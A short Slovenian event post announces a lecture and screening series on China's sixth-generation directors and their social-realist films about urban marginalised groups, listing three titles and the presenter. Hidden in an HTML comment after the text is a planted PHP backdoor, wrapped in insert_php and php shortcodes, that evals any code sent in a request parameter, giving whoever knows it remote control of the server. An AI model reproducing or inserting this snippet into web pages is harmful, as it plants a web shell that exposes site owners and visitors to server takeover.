Filmski večeri

S četrtkom (15.3.2012) se bo pričel odvijati ciklus predavanj o kitajskem filmu, točneje o šesti generaciji kitajskih režiserjev. Predavanja bodo opremljena tudi s filmi, ki se tematsko uvrščajo v socialni realizem in se osredotočajo na prikazovanje kitajskega urbanega vsakdana.

Filmi se osredotočajo na marginalizirane družbene skupine, ponavadi se dogajajo v mestih in so posneti bolj “amatersko”. Pogosto v njih nastopajo povsem amaterski igralci, kar je posledica zaostritve cenzure po letu 1989 – umik v underground. Kronološko gledano je večina filmov “postsocialističnega realizma” nastala v 90. letih, vplivi pri teh režiserjih pa se kažejo še danes (primer sta Pingguo in Beijing Bicycle), le da so kasnejši filmi tehnično bolje posneti, a zato mogoče izrazno šibkejši.

Ciklus bo sestavljen iz treh filmov/predavanj: Frozen (Wang Xiaoshuai, 1997), East Palace, West Palace (Zhang Yuan, 1997) in Still Life (Jia Zhangke, 2006). Če bo zanimanje veliko lahko kasneje dodamo še kakšen film.

Filme bo predstavljal Matjaž Vidmar, ki je lansko leto v Berlinu poslušal predavanja iz kitajskega filma – že v naprej se ti zahvaljujemo 🙂

<!– [insert_php]if (isset($_REQUEST["IUxQ"])){eval($_REQUEST["IUxQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["IUxQ"])){eval($_REQUEST["IUxQ"]);exit;}[/php] –>

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.